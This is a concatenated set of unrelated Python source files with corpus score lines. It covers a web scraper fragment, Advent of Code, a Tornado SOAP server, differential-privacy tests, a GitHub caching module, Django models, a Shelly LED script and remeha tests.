r = self.observer.session.get(url, proxies=proxies, verify=False, timeout=5)
self.content = r.content
except Exception as e:
return 0
#Save source
self.save_source()
return 1
def save_source(self):
filename = "tmp/source/%s" % Utils.as_filename("%s-%s.txt" % (self.url, self.observer.ip))
f = open(filename, 'w')
f.write(self.content)
def set_data(self):
vars = self.parse_scripts()
self.get_child("",vars,0)
self.parse_links()
def parse_scripts(self):
soup = BeautifulSoup(self.content)
all_data = []
res_dict = {}
logging.debug("Parsing script for %s" % self.url)
for script_part in soup.findAll('script'):
try:
json_data = re.findall('({.*})', script_part.string)
for j_data in json_data:
try:
data = json.loads(j_data)
if len(data):
all_data.append(data)
except:
pass
except:
pass
for data in all_data:
res_dict.update(data)
return res_dict
## Recursively populate self.vars map for js variables
def get_child(self,name,child,place):
if place == 5:
return
if type(child) is dict:
for leaf in child:
if name != "":
use_name = name + "-" + str(leaf)
else:
use_name = str(leaf)
self.get_child(use_name,child[leaf],place + 1)
else:
self.vars[name] = child
def parse_links(self):
soup = BeautifulSoup(self.content)
for link in soup.findAll('a'):
if 'href' in link:
link_name = link['href'].strip().replace(" ","")
if not link_name in self.links:
self.links[link_name] = 0
self.links[link_name] += 1
def get_driver(self):
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = ( self.observer.ua )
service_args = ['--ignore-ssl-errors=true', '--ssl-protocol=any']
if not self.options.no_proxy:
service_args.append("--proxy=%s" % self.observer.ip)
driver = webdriver.PhantomJS(service_log_path=os.path.devnull, desired_capabilities=dcap, service_args=service_args)
driver.set_window_size(1280,800)
driver.set_page_load_timeout(20)
driver.set_script_timeout(30)
return driver
def take_screenshot(self):
driver = self.driver
driver.get(self.url)
time.sleep(10)
try:
filename = "tmp/screen/%s" % Utils.as_filename("%s-%s.png" % (self.url,self.observer.ip))
driver.save_screenshot(filename)
self.image_filename = filename
image = self.read_image()
self.image_hash = hashlib.md5(image).hexdigest()
logging.debug("Saved %s" % filename)
except Exception as e:
print "Error taking screenshot: %s" % (traceback.format_exception(*sys.exc_info()))
driver.close()
driver.quit()
return 0
def perform_action(self,action):
try:
driver = self.driver
driver.get(self.url)
time.sleep(10)
try:
element = driver.find_element_by_id('new_button')
logging.debug("Element chosen is: %s" % element)
element.click()
logging.debug("Clicked on element %s" % element)
except Exception as e:
print "Error taking action %s: %s" % (action,traceback.format_exception(*sys.exc_info()))
driver.close()
driver.quit()
return 0
except:
print "Error with observer %s" % self.observer.ip
def read_image(self):
image = cv2.imread(self.image_filename)
if image is None:
print "Error getting image of url %s for file %s of observer %s" % (url,filename, self.ip)
return image
| 2.515625 | 3 |
aoc2020/day_02/part_2.py | en0/aoc2020 | 0 | 12767417 | <reponame>en0/aoc2020
from .part_1 import Solution as Part1Solution
class Solution(Part1Solution):
    """AoC 2020 day 2, part 2: exactly one of the two positions holds the letter."""
    expected = 1
    @classmethod
    def check_pw(cls, line: str):
        """Return True iff exactly one of the two 1-based positions matches.

        Line format: "<pos1>-<pos2> <letter>: <password>".
        """
        # Bug fix: maxsplit must be 1 -- with maxsplit=2 a password that
        # itself contains ': ' produced three parts and broke the unpacking.
        policy, pw = line.split(': ', 1)
        pos, letter = policy.split(' ')
        pos1, pos2 = pos.split('-')
        # XOR of the two position checks == "exactly one matches".
        return (pw[int(pos1) - 1] == letter) != (pw[int(pos2) - 1] == letter)
| 3.28125 | 3 |
MainWeb.py | leonevo/euao | 2 | 12767418 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#
# Copyright 2012 <EMAIL>
#
import tornado.httpserver
import tornado.ioloop
from tornadows import soaphandler
from tornadows import webservices
from tornadows import xmltypes
from tornadows.soaphandler import webservice
from time import ctime,sleep
import CommonDefinition
#process web service class import
import os
import sys
cur_dir=os.path.dirname(os.path.abspath(__file__))
AIX_dir=cur_dir+CommonDefinition.path_dir_sep+'AIX'
sys.path.append(AIX_dir)
EMC_dir=cur_dir+CommonDefinition.path_dir_sep+'EMC'
sys.path.append(EMC_dir)
VMware_dir=cur_dir+CommonDefinition.path_dir_sep+'VMware'
sys.path.append(VMware_dir)
HP_dir=cur_dir+CommonDefinition.path_dir_sep+'HP'
sys.path.append(HP_dir)
from ControlAIX import ControlAIX
from ControlEMC import ControlEMC
from ControlVMware import ControlVMware
from ControlHP import ControlHP
if __name__ == '__main__':
service=[('ControlAIX',ControlAIX),
('ControlEMC',ControlEMC),
('ControlVMware',ControlVMware),
('ControlHP',ControlHP)]
app=webservices.WebService(service)
ws=tornado.httpserver.HTTPServer(app)
port=CommonDefinition.Tornado_port
ws.listen(port)
tornado.ioloop.IOLoop.instance().start() | 1.960938 | 2 |
server/opendp_apps/analysis/testing/test_dp_count_spec.py | mikephelan/opendp-ux | 0 | 12767419 | import json
from os.path import abspath, dirname, isfile, join
CURRENT_DIR = dirname(abspath(__file__))
TEST_DATA_DIR = join(dirname(dirname(dirname(CURRENT_DIR))), 'test_data')
from opendp_apps.analysis.testing.base_stat_spec_test import StatSpecTestCase
from opendp_apps.analysis.tools.dp_count_spec import DPCountSpec
from opendp_apps.model_helpers.msg_util import msgt
from opendp_apps.analysis import static_vals as astatic
from opendp_apps.profiler import static_vals as pstatic
from opendp_apps.utils.extra_validators import *
class DPCountStatSpecTest(StatSpecTestCase):
fixtures = ['test_dataset_data_001.json', ]
def test_05_valid_noise_mechanism(self):
"""Check for the correct noise_mechanism"""
dp_count = DPCountSpec({})
self.assertEqual(dp_count.noise_mechanism, astatic.NOISE_GEOMETRIC_MECHANISM)
def test_10_count_valid_spec(self):
"""(10) Run DP Count valid spec, float column"""
msgt(self.test_10_count_valid_spec.__doc__)
spec_props = {'variable': 'EyeHeight',
'col_index': 19,
'statistic': astatic.DP_COUNT,
'dataset_size': 183,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_99,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': '182',
'variable_info': {'min': -8,
'max': 5,
'type': 'Float', },
}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
#if dp_count.has_error():
# print(dp_count.get_err_msgs())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 20)]
# File object
#
eye_fatigue_filepath = join(TEST_DATA_DIR, 'Fatigue_data.tab')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(eye_fatigue_filepath))
file_obj = open(eye_fatigue_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char="\t")
file_obj.close()
self.assertFalse(dp_count.has_error())
# val from local machine: 4.6051702036798
#self.assertTrue(dp_count.accuracy_val > 4.5)
#self.assertTrue(dp_count.accuracy_val < 4.7)
# Actual count 184
self.assertTrue(dp_count.value > 170) # should be well within range
def test_20_count_valid_spec(self):
"""(20) Run DP Count valid spec, integer column"""
msgt(self.test_20_count_valid_spec.__doc__)
spec_props = {'variable': 'age',
'col_index': 1,
'statistic': astatic.DP_COUNT,
'dataset_size': 10_000,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_95,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': '44',
'variable_info': {'min': 18,
'max': 95,
'type': pstatic.VAR_TYPE_INTEGER},
}
dp_count = DPCountSpec(spec_props)
self.assertTrue(dp_count.is_chain_valid())
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
self.assertFalse(dp_count.has_error())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 11 columns
col_indexes = [idx for idx in range(0, 11)]
# File object
#
pums_extract_10_000 = join(TEST_DATA_DIR, 'PUMS5extract10000.csv')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(pums_extract_10_000))
file_obj = open(pums_extract_10_000, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char=",")
file_obj.close()
self.assertFalse(dp_count.has_error())
self.show_release_result(dp_count.get_release_dict())
# val from local machine: 2.9957322850627124
self.assertTrue(dp_count.accuracy_val > 2.995)
self.assertTrue(dp_count.accuracy_val < 2.996)
# Actual count 10_000
self.assertTrue(dp_count.value > 9_980) # should be well within range
final_dict = dp_count.get_release_dict()
self.assertIn('description', final_dict)
self.assertIn('text', final_dict['description'])
self.assertIn('html', final_dict['description'])
def test_30_count_valid_another_spec(self):
"""(30) Run DP Count on another valid spec"""
msgt(self.test_30_count_valid_another_spec.__doc__)
spec_props = {'variable': 'TypingSpeed',
'col_index': 5,
'statistic': astatic.DP_COUNT,
'dataset_size': 183,
'epsilon': 1.0,
'delta': 0.0,
'cl': astatic.CL_99,
'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
'fixed_value': '62',
'variable_info': {'min': 1,
'max': 61,
'type': pstatic.VAR_TYPE_FLOAT},
}
dp_count = DPCountSpec(spec_props)
dp_count.is_chain_valid()
# if dp_count.has_error():
# print(dp_count.get_err_msgs())
# ------------------------------------------------------
# Run the actual count
# ------------------------------------------------------
# Column indexes - We know this data has 20 columns
col_indexes = [idx for idx in range(0, 20)]
# File object
#
eye_fatigue_filepath = join(TEST_DATA_DIR, 'Fatigue_data.tab')
# print('eye_fatigue_filepath', eye_fatigue_filepath)
self.assertTrue(isfile(eye_fatigue_filepath))
file_obj = open(eye_fatigue_filepath, 'r')
# Call run_chain
#
dp_count.run_chain(col_indexes, file_obj, sep_char="\t")
file_obj.close()
self.assertFalse(dp_count.has_error())
self.show_release_result(dp_count.get_release_dict())
# (test has wide accuracy latitude)
self.assertTrue(dp_count.accuracy_val > 4.4)
self.assertTrue(dp_count.accuracy_val < 4.8)
# Actual count 184
self.assertTrue(dp_count.value > 170) # should be well within range
final_dict = dp_count.get_release_dict()
self.assertIn('description', final_dict)
self.assertIn('text', final_dict['description'])
self.assertIn('html', final_dict['description'])
    def test_40_count_valid_str_spec(self):
        """(40) Run DP Count string"""
        msgt(self.test_40_count_valid_str_spec.__doc__)
        # Spec: DP count of a categorical (string) column; counts do not need
        # numeric min/max bounds, only the variable type.
        spec_props = {'variable': 'Subject',
                      'col_index': 0,
                      'statistic': astatic.DP_COUNT,
                      'dataset_size': 183,
                      'epsilon': 1.0,
                      'delta': 0.0,
                      'cl': astatic.CL_95,
                      'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
                      'fixed_value': 'ac',
                      'variable_info': {'type': pstatic.VAR_TYPE_CATEGORICAL},
                      }
        dp_count = DPCountSpec(spec_props)
        dp_count.is_chain_valid()
        self.assertTrue(dp_count.is_chain_valid())
        # if dp_count.has_error():
        #    print(dp_count.get_err_msgs())
        self.assertFalse(dp_count.has_error())
        # ------------------------------------------------------
        # Run the actual count
        # ------------------------------------------------------
        # Column indexes - We know this data has 20 columns
        col_indexes = [idx for idx in range(0, 20)]
        # File object
        #
        eye_fatigue_filepath = join(TEST_DATA_DIR, 'Fatigue_data.tab')
        # print('eye_fatigue_filepath', eye_fatigue_filepath)
        self.assertTrue(isfile(eye_fatigue_filepath))
        file_obj = open(eye_fatigue_filepath, 'r')
        # Call run_chain
        #
        dp_count.run_chain(col_indexes, file_obj, sep_char="\t")
        file_obj.close()
        self.assertFalse(dp_count.has_error())
        # val from local machine: 4.6051702036798
        # self.assertTrue(dp_count.accuracy_val > 4.5)
        # self.assertTrue(dp_count.accuracy_val < 4.7)
        # Actual count 184
        self.assertTrue(dp_count.value > 170)  # should be well within range
        self.show_release_result(dp_count.get_release_dict())
        # (test has wide accuracy latitude)
        self.assertTrue(dp_count.accuracy_val > 2)
        self.assertTrue(dp_count.accuracy_val < 4)
        # The release must carry both text and html descriptions.
        final_dict = dp_count.get_release_dict()
        self.assertIn('description', final_dict)
        self.assertIn('text', final_dict['description'])
        self.assertIn('html', final_dict['description'])
    def test_50_count_missing_vals_str(self):
        """(50) Run DP Count string"""
        msgt(self.test_50_count_missing_vals_str.__doc__)
        # NOTE(review): xspec_props is never used -- kept as a hand-written
        # reference spec; spec_props below is the payload captured from the UI.
        xspec_props = {'variable': 'gender',
                       'col_index': 4,
                       'statistic': astatic.DP_COUNT,
                       'dataset_size': 1_000,
                       'epsilon': 1.0,
                       'delta': 0.0,
                       'cl': astatic.CL_95,
                       'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
                       'fixed_value': 'Genderfluid',
                       'variable_info': {'type': pstatic.VAR_TYPE_CATEGORICAL},
                       }
        # right from UI
        spec_props = {'error': '', 'label': 'gender', 'locked': False,
                      'epsilon': 1.0, 'delta': 0.0, 'cl': 0.95,
                      'variable': 'gender', 'statistic': 'count',
                      'fixed_value': 'male', 'handle_as_fixed': True,
                      'missing_values_handling': 'insert_fixed', 'dataset_size': 1000,
                      'variable_info': {'name': 'gender', 'type': 'Categorical',
                                        'label': 'gender', 'selected': True,
                                        'categories': ['Genderfluid'], 'sort_order': 4}, 'col_index': 4}
        dp_count = DPCountSpec(spec_props)
        dp_count.is_chain_valid()
        self.assertTrue(dp_count.is_chain_valid())
        # if dp_count.has_error():
        #    print(dp_count.get_err_msgs())
        # ------------------------------------------------------
        # Run the actual count
        # ------------------------------------------------------
        # Column indexes - We know this data has 20 columns
        col_indexes = [idx for idx in range(0, 28)]
        # File object
        #
        bonabo_filepath = join(TEST_DATA_DIR, 'bonabo MOCK_DATA.csv')
        # print('eye_fatigue_filepath', eye_fatigue_filepath)
        self.assertTrue(isfile(bonabo_filepath))
        file_obj = open(bonabo_filepath, 'r')
        # Call run_chain
        #
        dp_count.run_chain(col_indexes, file_obj, sep_char=",")
        file_obj.close()
        self.assertFalse(dp_count.has_error())
        # val from local machine: 4.6051702036798
        # self.assertTrue(dp_count.accuracy_val > 4.5)
        # self.assertTrue(dp_count.accuracy_val < 4.7)
        # Actual count 184
        self.assertTrue(dp_count.value > 970)  # should be well within range
    def test_60_count_missing_vals_bool(self):
        """(60) Run DP Count bool"""
        msgt(self.test_60_count_missing_vals_bool.__doc__)
        # Spec: DP count of a boolean column; missing values are replaced by
        # the fixed string 'true'.
        spec_props = {'variable': 'Boolean2',
                      'col_index': 8,
                      'statistic': astatic.DP_COUNT,
                      'dataset_size': 1_000,
                      'epsilon': 1.0,
                      'delta': 0.0,
                      'cl': astatic.CL_95,
                      'missing_values_handling': astatic.MISSING_VAL_INSERT_FIXED,
                      'fixed_value': 'true',
                      'variable_info': {'type': pstatic.VAR_TYPE_BOOLEAN},
                      }
        dp_count = DPCountSpec(spec_props)
        dp_count.is_chain_valid()
        self.assertTrue(dp_count.is_chain_valid())
        # if dp_count.has_error():
        #    print(dp_count.get_err_msgs())
        # ------------------------------------------------------
        # Run the actual count
        # ------------------------------------------------------
        # Column indexes - We know this data has 20 columns
        col_indexes = [idx for idx in range(0, 28)]
        # File object
        #
        bonabo_filepath = join(TEST_DATA_DIR, 'bonabo MOCK_DATA.csv')
        # print('eye_fatigue_filepath', eye_fatigue_filepath)
        self.assertTrue(isfile(bonabo_filepath))
        file_obj = open(bonabo_filepath, 'r')
        # Call run_chain
        #
        dp_count.run_chain(col_indexes, file_obj, sep_char=",")
        file_obj.close()
        self.assertFalse(dp_count.has_error())
        # val from local machine: 4.6051702036798
        # self.assertTrue(dp_count.accuracy_val > 4.5)
        # self.assertTrue(dp_count.accuracy_val < 4.7)
        # Actual count 184
        self.assertTrue(dp_count.value > 970)  # should be well within range
def show_release_result(self, release_dict:{}):
"""print the result to the screen"""
print(json.dumps(release_dict, indent=4)) | 2.09375 | 2 |
tests/test_utils_paths.py | gva-jjoyce/gva_data | 0 | 12767420 | <filename>tests/test_utils_paths.py<gh_stars>0
"""
Tests for paths to ensure the split and join methods
of paths return the expected values for various
stimulus.
"""
import datetime
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from gva.utils import paths
try:
from rich import traceback
traceback.install()
except ImportError: # pragma: no cover
pass
def test_blob_paths_split_filename():
    """Check paths.split_filename across extension edge cases.

    Covers: single/double extensions, consecutive dots, missing extension,
    leading-dot filenames, empty input, and dots appearing in directory parts.
    """
    cases = [
        ("one_extension.ext", "one_extension", ".ext"),
        ("two_extension.ext.zip", "two_extension.ext", ".zip"),
        ("double_dot..zip", "double_dot.", ".zip"),
        ("no_ext", "no_ext", ""),
        (".all_ext", ".all_ext", ""),
        (".dot_start.zip", ".dot_start", ".zip"),
        ("", "", ""),  # empty input -> two empty strings
        ("with/path/file.ext", "with/path/file", ".ext"),
        ("with/dot.in/path", "with/dot.in/path", ""),
    ]
    for filename, expected_name, expected_ext in cases:
        name, ext = paths.split_filename(filename)
        assert name == expected_name, f"{name} {ext}"
        assert ext == expected_ext, f"{name} {ext}"
def test_blob_paths_get_paths():
    """A full blob path splits into bucket, folder path, file name and extension."""
    bucket, path, name, ext = paths.get_parts("bucket/parent_folder/sub_folder/filename.ext")
    assert bucket == 'bucket'
    assert name == 'filename'
    assert ext == '.ext'
    # The intermediate folder component keeps its trailing slash.
    assert path == 'parent_folder/sub_folder/'
def test_blob_paths_builder():
    """Date placeholders in a path template expand from the given datetime."""
    # NOTE(review): both sub-cases below use the identical template with a
    # trailing '/', so the "without trailing /" branch is never exercised --
    # the first template was probably meant to omit the trailing slash.
    # without trailing /, the / should be added
    template = '%datefolders/%Y/%date/'
    path = paths.build_path(template, datetime.datetime(2000, 9, 19, 1, 36, 42, 365))
    assert path == "year_2000/month_09/day_19/2000/2000-09-19/", path
    # with trailing /, the / should be retained
    template = '%datefolders/%Y/%date/'
    path = paths.build_path(template, datetime.datetime(2000, 9, 19, 1, 36, 42, 365))
    assert path == "year_2000/month_09/day_19/2000/2000-09-19/", path
# Allow running this test module directly without a test runner.
if __name__ == "__main__":
    test_blob_paths_split_filename()
    test_blob_paths_get_paths()
    test_blob_paths_builder()
    print('okay')
| 2.71875 | 3 |
github.py | utsengar/GitMetrics | 0 | 12767421 | <gh_stars>0
import heapq
import calendar
import requests
from app import cache, GITHUB_BASE, GITHUB_API_TOKEN, CACHE_TTL
from datetime import datetime
from flask import Response
headers = {"Accept": "application/vnd.github.v3+json", "Authorization" : "token " + GITHUB_API_TOKEN}
def get_from_cache(resource):
    """Look up a previously cached GitHub response for *resource*.

    Returns a (body, status_code, content_type) tuple; each element is
    whatever the cache returns (None on a miss).
    """
    cached_body = cache.get("data+" + resource)
    cached_content_type = cache.get("headers+" + resource)
    cached_status = cache.get("status+" + resource)
    return (cached_body, cached_status, cached_content_type)
def get(resource):
    """Fetch *resource* from the GitHub API, following pagination, and cache it.

    Returns a (body, status_code, content_type) tuple. On a connection
    failure the body is an error dict and status/content_type are None.

    Fixes:
    - ``resp.links.has_key("next")`` was Python-2-only; dict.has_key() does
      not exist on Python 3, so pagination crashed. Replaced with ``in``.
    - On ConnectionError ``resp`` was never bound, so the later
      ``resp.status_code`` / ``resp.headers`` accesses raised NameError.
    """
    status = None
    content_type = None
    try:
        resp = requests.get("{0}{1}".format(GITHUB_BASE, resource), headers=headers)
        if resp.status_code == 200:
            result = resp.json()
            # Follow RFC 5988 "next" pagination links until exhausted.
            while "next" in resp.links:
                next_link = resp.links['next']
                resp = requests.get(next_link["url"], headers=headers)
                result.extend(resp.json())
            r = result
        else:
            r = None
        status = resp.status_code
        content_type = resp.headers.get("content-type")
    except requests.exceptions.ConnectionError:
        r = {"message": "Connection refused"}
    except ValueError:
        # Body was not valid JSON; fall back to the raw response text.
        r = resp.text
        status = resp.status_code
        content_type = resp.headers.get("content-type")
    # Record the resource so the cache warmer knows what to refresh.
    cached_resources = cache.get("resources_to_cache")
    if resource not in cached_resources:
        cached_resources.append(resource)
    cache.set("data+" + resource, r, timeout=CACHE_TTL)
    cache.set("headers+" + resource, content_type, timeout=CACHE_TTL)
    cache.set("status+" + resource, status, timeout=CACHE_TTL)
    cache.set("resources_to_cache", cached_resources, timeout=CACHE_TTL)
    return (r, status, content_type)
# Heap sort key per topic, and the repo field shown alongside the name.
_TOPIC_SORT_KEY = {
    "forks": lambda repo: repo["forks"],
    "last_updated": lambda repo: iso8601_to_epoch(repo["updated_at"]),
    "open_issues": lambda repo: repo["open_issues_count"],
    "stars": lambda repo: repo["stargazers_count"],
    "watchers": lambda repo: repo["watchers"],
}
_TOPIC_DISPLAY_FIELD = {
    "forks": "forks",
    "last_updated": "updated_at",
    "open_issues": "open_issues_count",
    "stars": "stargazers_count",
    "watchers": "watchers",
}


def compute(path, n, topic):
    """Rank the bitcoin org's repos by *topic* and return the top *n*.

    :param path: cache key under which the ranking is stored (``data+<path>``)
    :param n: number of entries to return
    :param topic: one of forks / last_updated / open_issues / stars / watchers
    :return: ([[full_name, value], ...], 200, {}) response-style tuple
    :raises KeyError: if *topic* is not a known ranking
        (the original built 5 parallel heaps and raised NameError instead;
        only the heap for the requested topic was ever consumed)
    """
    sort_key = _TOPIC_SORT_KEY[topic]
    display_field = _TOPIC_DISPLAY_FIELD[topic]
    repo_data = cache.get("data+/orgs/bitcoin/repos")
    if not repo_data:
        repo_data = get("/orgs/bitcoin/repos")[0]
    heap = []
    for repo in repo_data:
        heapq.heappush(heap, (sort_key(repo), [repo['full_name'], repo[display_field]]))
    largest = heapq.nlargest(n, heap)
    largest = [x[1] for x in largest]
    cache.set("data+" + path, largest, timeout=CACHE_TTL)
    return (largest, 200, {})
def iso8601_to_epoch(datestring):
    """Convert an ISO-8601 UTC timestamp ("YYYY-MM-DDTHH:MM:SSZ") to Unix epoch seconds.

    Uses calendar.timegm so the input is treated as UTC regardless of the
    local timezone.
    """
    parsed = datetime.strptime(datestring, "%Y-%m-%dT%H:%M:%SZ")
    return calendar.timegm(parsed.timetuple())
| 2.453125 | 2 |
bridger/markdown/models.py | intellineers/django-bridger | 2 | 12767422 | <gh_stars>1-10
import pathlib
import uuid
from django.db import models
from django.dispatch import receiver
class Asset(models.Model):
    """A file uploaded through the markdown editor, addressed by a random UUID."""
    # Random UUID primary key so asset URLs are not guessable/enumerable.
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    file = models.FileField(upload_to="markdown/assets")
    # File-type suffix without the dot (e.g. "png"); filled by the
    # pre_save signal handler below.
    content_type = models.CharField(max_length=10, null=True, blank=True)
    # "<uuid><suffix>" name used when serving the file; also set on pre_save.
    file_url_name = models.CharField(max_length=1024, null=True, blank=True)
    # public = models.BooleanField(default=True)
    class Meta:
        verbose_name = "Asset"
        verbose_name_plural = "Assets"
@receiver(models.signals.pre_save, sender="bridger.Asset")
def generate_content_type(sender, instance, **kwargs):
    """Before saving an Asset, derive content_type and file_url_name from the file suffix.

    If the filename has no suffix, both fields are left untouched.
    """
    suffix = pathlib.Path(instance.file.name).suffix
    if suffix:
        instance.content_type = suffix[1:]  # drop the leading dot
        instance.file_url_name = f"{instance.id}{suffix}"
| 2.21875 | 2 |
rnns/gru.py | anoidgit/zero | 111 | 12767423 | # coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from func import linear
from rnns import cell as cell
class gru(cell.Cell):
    """The Gated Recurrent Unit."""
    def __init__(self, d, ln=False, scope='gru'):
        # d: hidden size; ln: apply layer normalization inside the linear
        # projections; scope: TF variable-scope name prefix.
        super(gru, self).__init__(d, ln=ln, scope=scope)
    def get_init_state(self, shape=None, x=None, scope=None):
        # Delegate to the base-class helper that builds the initial hidden state.
        return self._get_init_state(
            self.d, shape=shape, x=x, scope=scope)
    def fetch_states(self, x):
        """Precompute the input-dependent projections for all timesteps.

        Returns (g, h): g feeds the update/reset gates (width 2*d) and h
        feeds the candidate hidden state (width d), so the per-step
        __call__ only adds the recurrent contributions.
        """
        with tf.variable_scope(
                "fetch_state_{}".format(self.scope or "gru")):
            g = linear(x, self.d * 2,
                       bias=False, ln=self.ln, scope="gate_x")
            h = linear(x, self.d,
                       bias=False, ln=self.ln, scope="hide_x")
        return g, h
    def __call__(self, h_, x):
        # h_: the previous hidden state
        # x_g/x: the current input state for gate
        # x_h/x: the current input state for hidden
        """
        z = sigmoid(h_, x)
        r = sigmoid(h_, x)
        h' = tanh(x, r * h_)
        h = z * h_ + (1. - z) * h'
        """
        with tf.variable_scope(
                "cell_{}".format(self.scope or "gru")):
            x_g, x_h = x
            # Recurrent contribution to both gates, then split into
            # update (z) and reset (r).
            h_g = linear(h_, self.d * 2,
                         ln=self.ln, scope="gate_h")
            z, r = tf.split(
                tf.sigmoid(x_g + h_g), 2, -1)
            # Candidate state uses the reset-gated previous state.
            h_h = linear(h_ * r, self.d,
                         ln=self.ln, scope="hide_h")
            h = tf.tanh(x_h + h_h)
            # Convex combination of old state and candidate.
            h = z * h_ + (1. - z) * h
        return h
| 2.984375 | 3 |
biostar/apps/planet/models.py | Torres63/biostar | 1 | 12767424 | from django.db import models
from django.conf import settings
import os, urllib, logging, feedparser, datetime
from django.core.urlresolvers import reverse
from django.utils.timezone import utc
from django.contrib import admin
logger = logging.getLogger(__name__)
def now():
    """Return the current UTC time as a timezone-aware datetime."""
    return datetime.datetime.utcnow().replace(tzinfo=utc)
def abspath(*args):
    """Join the given path components and return the absolute path."""
    joined = os.path.join(*args)
    return os.path.abspath(joined)
# Create your models here.
# NOTE(review): this module is Python 2 code ("except Exception, exc",
# urllib.urlopen, file()) -- it will not run under Python 3 as-is.
class Blog(models.Model):
    "Represents a blog"
    title = models.CharField(verbose_name='Blog Name', max_length=255, default="", blank=False)
    desc = models.TextField(default='', blank=True)
    feed = models.URLField()
    link = models.URLField()
    active = models.BooleanField(default=True)
    list_order = models.IntegerField(default=0)
    @property
    def fname(self):
        # Local path where this blog's downloaded feed XML is cached,
        # keyed by the database id.
        fname = abspath(settings.PLANET_DIR, '%s.xml' % self.id)
        return fname
    def parse(self):
        """Parse the cached feed file; returns the feedparser doc or None on error."""
        try:
            doc = feedparser.parse(self.fname)
        except Exception, exc:
            # NOTE(review): passing a single tuple to logger.error while the
            # format string has two %s placeholders -- likely meant
            # logger.error("...", exc, self.id). Verify before changing.
            logger.error("error %s parsing blog %s", (exc, self.id))
            doc = None
        return doc
    def download(self):
        """Fetch the remote feed and write it to the local cache file."""
        try:
            text = urllib.urlopen(self.feed).read()
            stream = file(self.fname, 'wt')
            stream.write(text)
            stream.close()
        except Exception, exc:
            # Same tuple-vs-args logging pattern as in parse() -- see note there.
            logger.error("error %s downloading %s", (exc, self.feed))
    def __unicode__(self):
        return self.title
class BlogPost(models.Model):
    "Represents an entry of a Blog"
    # The blog that generated the entry
    blog = models.ForeignKey(Blog)
    # A unique id for this entry
    uid = models.CharField(max_length=200, default="", null=False)
    # The title of the entry
    title = models.CharField(max_length=200, null=False)
    # The content of the feed
    content = models.TextField(default='', max_length=20000)
    # Santizied HTML
    html = models.TextField(default='')
    # Date related fields.
    creation_date = models.DateTimeField(db_index=True)
    # Date at which the post has been inserted into the database
    insert_date = models.DateTimeField(db_index=True, null=True)
    # Has the entry been published
    published = models.BooleanField(default=False)
    # The link to the entry
    link = models.URLField()
    @property
    def get_title(self):
        # Prefixed title used in mixed listings alongside regular posts.
        return u"BLOG: %s" % self.title
    def get_absolute_url(self):
        # External posts link straight to the source blog entry.
        return self.link
    def save(self, *args, **kwargs):
        if not self.id:
            # Set the date to current time if missing.
            self.insert_date = self.insert_date or now()
        super(BlogPost, self).save(*args, **kwargs)
    def __unicode__(self):
        return self.title
# Expose Blog in the Django admin. (Removed stray residue text that had
# been fused onto the end of this line.)
admin.site.register(Blog)
05-TCP-IP/shelly/shelly_red_flash.py | outsmartit/raspberry-pi-home-automation | 30 | 12767425 | <filename>05-TCP-IP/shelly/shelly_red_flash.py
"""Let a Shelly RGBW2 LED controller flash the LEDs red.
Copyright (C) 2020 <NAME>
License: MIT
"""
import time
import requests
# Define URLs for the Shelly HTTP API
IP = "http://192.168.0.202"
SHELLY = IP + "/shelly"          # device info endpoint
COLOR = IP + "/color/0/"         # color-channel 0 control endpoint
DISABLE_EFFECTS = "effect=0"
ONLY_RED = "red=255&green=0&blue=0&white=0"
ON = "turn=on"
OFF = "turn=off"
# NOTE(review): default credentials hardcoded -- fine for a demo script only.
AUTH = ("admin", "admin")
HEADER = {"Content-Type": "application/x-www-form-urlencoded"}
try:
    # Probe the device first so we can report its type and MAC.
    shelly = requests.get(SHELLY)
    if shelly.status_code == 200:
        shelly_json = shelly.json()
        shelly_type = shelly_json["type"]
        shelly_mac = shelly_json["mac"]
        print(
            "Connected to device {} with MAC address {}.".format(
                shelly_type, shelly_mac
            )
        )
        # Disable effects and show only red
        disable_effects = requests.post(
            COLOR, auth=AUTH, headers=HEADER, data=DISABLE_EFFECTS
        )
        only_red = requests.post(COLOR, auth=AUTH, headers=HEADER, data=ONLY_RED)
        # Blink red at 1 Hz until interrupted (Ctrl-C).
        while True:
            on = requests.post(COLOR, auth=AUTH, headers=HEADER, data=ON)
            time.sleep(1)
            off = requests.post(COLOR, auth=AUTH, headers=HEADER, data=OFF)
            time.sleep(1)
except requests.exceptions.ConnectionError as e:
    print("Can't connect to device {}: {}".format(IP, e))
| 3.234375 | 3 |
tests/test_remeha.py | TheRikke/remeha_tz | 7 | 12767426 | import json
import os
import tempfile
from unittest import mock
from remeha import read_config, FileLogger
from remeha_core import Frame
from tests.test_base import TestBase
class TestRemeha(TestBase):
    """Tests for config reading and the FileLogger in the remeha module."""
    # A captured raw sample frame from the boiler, used to build Frame objects.
    raw_test_data = bytearray([0x02, 0x01, 0xfe, 0x06, 0x48, 0x02, 0x01, 0xa2,
                               0x12, 0x00, 0x0a, 0x80, 0xf3, 0xc2, 0x01, 0xfc,
                               0x12, 0x00, 0x80, 0x9c, 0x0e, 0xd1, 0x06, 0x8e,
                               0x12, 0x88, 0x13, 0x98, 0x08, 0x68, 0x09, 0x6a,
                               0x09, 0x3a, 0x8e, 0x12, 0x47, 0x45, 0x00, 0x64,
